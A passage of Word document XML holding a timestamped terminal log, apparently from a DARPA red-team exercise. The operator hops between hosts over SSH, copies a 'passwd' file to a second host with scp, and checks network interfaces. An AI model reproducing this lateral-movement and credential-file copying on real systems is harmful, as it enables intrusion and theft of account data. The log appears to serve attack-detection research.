      </w:pPr>
      <w:r>
        <w:t>No matching host key fingerprint found in DNS.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D026C41" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>Are you sure you want to continue connecting (yes/no)? yes</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50FFB21C" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>Warning: Permanently added '128.55.12.149' (ECDSA) to the list of known hosts.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C60B45C" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">admin@128.55.12.149's password: </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24F4259C" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">passwd                                                                                                                                                                                                                                                                                                    100% 2696     1.3MB/s   00:00  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="455392A2" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="322D3D33" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>13:44</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C919A08" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>[admin@ta1-cadets-1 ~]$ date</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48CEE9D7" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>Fri May 10 17:45:55 UTC 2019</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44EDBB24" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6F312C57" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>13:45</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C7F04C2" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>[admin@ta1-cadets-1 ~]$ ssh admin@128.55.12.110</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3FE669C2" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">admin@128.55.12.110's password: </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="057404CE" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>Welcome to Ubuntu 12.04.5 LTS (GNU/Linux 3.5.0-99-generic x86_64)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4EE917B2" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5F3EDEBB" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"> * Documentation:  https://help.ubuntu.com/</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09F38853" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5EC18A34" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">  System information as of Fri May 10 17:46:43 Local time zone must be set--see zic manual page 2019</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41DFD39E" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="42C62F5D" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">  System load:  0.66                Processes:           198</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4813C9E4" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">  Usage of /:   10.4% of 115.37GB   Users logged in:     1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A351821" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">  Memory usage: 15%                 IP address for eth0: 10.0.6.60</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21EB7DD6" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">  Swap usage:   0%                  IP address for eth1: 128.55.12.110</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62473808" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="613D7B12" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">  =&gt; There is 1 zombie process.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0EA75E86" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="45E1ED42" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">  Graph this data and manage this system at:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0757C7C2" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">    https://landscape.canonical.com/</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D971B97" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="390A5FF3" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>New release '14.04.5 LTS' available.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E0FBCED" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>Run 'do-release-upgrade' to upgrade to it.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1CCFAD29" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6632C84C" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="453AF39C" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="01A08603" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>Your current Hardware Enablement Stack (HWE) is no longer supported</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0641C882" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>since 2014-08-07.  Security updates for critical parts (kernel</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24B5C52C" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>and graphics stack) of your system are no longer available.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C59F2D2" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="51C547EE" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>For more information, please see:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18654B68" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>http://wiki.ubuntu.com/1204_HWE_EOL</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="010A9560" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0E112705" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">There is a graphics stack installed on this system. An upgrade to a </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4312A590" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>supported (or longer supported) configuration will become available</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D6653E0" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>on 2014-07-16 and can be invoked by running 'update-manager' in the</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19AC9058" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>Dash.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C2A3CE4" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B6E9DCA" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6DA8399A" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>Last login: Fri May 10 17:46:11 2019 from ta51-bg-gen.local</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69B6C660" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">admin@ta1-theia-target-1:~$ </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23E52D6A" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2A0BFB80" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>13:47</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28BC159F" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>admin@ta1-theia-target-1:~$ ls</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52965079" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>Desktop    Downloads  Pictures  Templates  backup      brachyural~  dot_mozilla_pre_e5  ethnical          files            grains  hsperfdata_darpa  leste   nodeexporter  out249  out327~  out559  out857  out892  passwd          test  wrathlike</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B9A1862" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>Documents  Music      Public    Videos     brachyural  docs         efox                examples.desktop  glx_alsa_675.ko  hosts   jna-95354950      minion  out20         out327  out514   out724  out864  out912  symbolizations  work</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="11A64D0F" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="33E6E9D4" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>13:47</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3CA53864" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>admin@ta1-theia-target-1:~$ scp passwd admin@128.55.12.149:.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29712E05" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>The authenticity of host '128.55.12.149 (128.55.12.149)' can't be established.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75FF398C" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>ECDSA key fingerprint is 96:21:91:4e:ed:61:d6:9e:d8:ab:ed:0a:4b:41:44:7f.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B4FB7DA" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>Are you sure you want to continue connecting (yes/no)? yes</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C4D1A1D" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>Warning: Permanently added '128.55.12.149' (ECDSA) to the list of known hosts.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54EF7DEF" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">admin@128.55.12.149's password: </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02BF2AE5" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">passwd                                                                                                                                                                                                                                                                                                    100% 2696     2.6KB/s   00:00 </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7ADD4A56" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1679B976" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>13:52</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56CCA3C8" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">admin@ta1-theia-target-1:~$ ifconfig    </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03B4072D" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">eth0      Link encap:Ethernet  HWaddr 52:54:00:f0:0d:60  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C8402D2" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">          inet addr:10.0.6.60  Bcast:10.0.7.255  Mask:255.255.252.0</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F6CF1FA" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">          inet6 addr: fe80::5054:ff:fef0:d60/64 Scope:Link</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="718BECCB" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">          UP BROADCAST RUNNING MULTICAST  MTU:1500  Metric:1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="200813F2" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">          RX packets:1873330 errors:0 dropped:3 overruns:0 frame:0</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70F1E97A" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">          TX packets:111485 errors:0 dropped:0 overruns:0 carrier:0</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B96E0DD" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">          collisions:0 txqueuelen:1000 </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="363D355C" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">          RX bytes:318388425 (318.3 MB)  TX bytes:134366916 (134.3 MB)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6534D14D" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="364E70BB" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">eth1      Link encap:Ethernet  HWaddr 52:54:00:f0:08:60  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A479623" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">          inet addr:128.55.12.110  Bcast:128.55.12.255  Mask:255.255.255.0</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2757C59C" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">          inet6 addr: fe80::5054:ff:fef0:860/64 Scope:Link</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D44C61D" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">          UP BROADCAST RUNNING MULTICAST  MTU:1500  Metric:1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02713B94" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">          RX packets:19041226 errors:0 dropped:3 overruns:0 frame:0</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D0745C0" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">          TX packets:6709374 errors:0 dropped:0 overruns:0 carrier:0</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B0BBE4E" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">          collisions:0 txqueuelen:1000 </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C9081DC" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">          RX bytes:1708680151 (1.7 GB)  TX bytes:107495966372 (107.4 GB)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4ED2D8B8" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="09D0F82B" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">lo        Link encap:Local Loopback  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30CD3D9F" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">          inet addr:127.0.0.1  Mask:255.0.0.0</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4CC1D8D9" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">          inet6 addr: ::1/128 Scope:Host</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43A8DFBD" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">          UP LOOPBACK RUNNING  MTU:16436  Metric:1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="409C2682" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">          RX packets:8 errors:0 dropped:0 overruns:0 frame:0</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="417E22B1" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">          TX packets:8 errors:0 dropped:0 overruns:0 carrier:0</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F05B57F" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">          collisions:0 txqueuelen:0 </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="391090C5" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">          RX bytes:460 (460.0 B)  TX bytes:460 (460.0 B)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B8EA1EB" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="39E691BC" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>14:22</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D719936" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>admin@ta1-theia-target-1:~$ ssh admin@128.55.12.118</w:t>
      </w:r>
    </w:p>
